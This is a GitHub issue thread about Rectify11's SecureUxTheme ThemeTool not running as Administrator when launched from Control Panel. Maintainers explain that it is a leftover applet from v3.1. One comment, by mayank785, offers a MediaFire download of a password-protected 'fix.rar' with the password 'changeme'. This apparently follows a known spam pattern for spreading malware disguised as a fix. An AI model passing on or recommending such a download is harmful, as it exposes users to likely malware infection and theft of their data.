### ISSUE TITLE
SecureUxTheme ThemeTool in Control Panel: Not running as Administrator!

### ISSUE THREAD

**Issue by MuscularPuky** [Rectify11/Installer#611]
### Description

I think it should be launched as Administrator even in Control Panel

+Can I handle the toggling high contrast theme issue with ThemeTool?

### Steps To Reproduce

1. Open Control Panel
2. Go to "Appearance and Personalization
3. Tap the "Change Themes"
4. Warranty disclaimer dialog displayed
5. OK SecureUxTheme launched but is saying Not running as Administrator! so can't configurate
6. So I had to go to SecureUxTheme path and run as Administrator manually

### Rectify11 Version

3.2.70.1+c57eb635250343e507af6c95c853d194223fc44b

### Windows Version

Windows vNext, NT 10.0.27686.1000

### Logs

Unfortunately there's no log

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MishaProductions** [comment]
That applet is no longer installed.

**Comment by MuscularPuky** [comment]
> That applet is no longer installed.

?

Is that legacy of v3.1 you mean?

**Comment by MishaProductions** [comment]
yeah, it's a left over. not sure why it didn't get uninstalled.
